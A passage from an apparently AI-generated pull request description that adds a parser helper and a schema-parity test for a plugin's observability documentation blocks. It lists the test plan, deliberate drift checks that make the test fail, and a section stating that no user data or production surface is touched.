- Add `extractAllObservabilityBlocks` to `plugins/soleur/test/lib/discoverability-test-parser.ts`; `extractObservabilityBlock` delegates to it (behavior-preserving for real single-block plans).

## Test plan

- [x] `bun test plugins/soleur/test/observability-schema-parity.test.ts` → 4 pass
- [x] RED evidence — the guard bites when any single surface drifts:
  - rename `logs`→`log_output` in one template block → surface-2 FAILs naming `template block #2`
  - `(5 fields)`→`(6 fields)` in `AGENTS.core.md` → surface-4 FAILs
  - rename `logs` in canonical `plan/SKILL.md` only → 3 surfaces FAIL (canonical anchor + templates + deepen-plan)
- [x] Refactor is behavior-preserving: `preflight-discoverability-test.test.ts` → 42 pass
- [x] Auto-discovered by `bun test plugins/soleur/` (no `scripts/test-all.sh` edit)
- [x] Full suite `scripts/test-all.sh` → 161/161 suites pass

## User-Brand Impact

- **Data/credential surface touched:** none — the test reads only in-repo documentation files; no user data, secrets, or external services.
- **Failure mode if broken:** a false-passing or false-failing CI check on the Soleur plugin's own test suite; nothing user-facing.
- **Brand-survival threshold:** none, reason: pure test addition over committed docs under `plugins/soleur/test/`; touches no production surface.

Generated with [Claude Code](https://claude.com/claude-code)
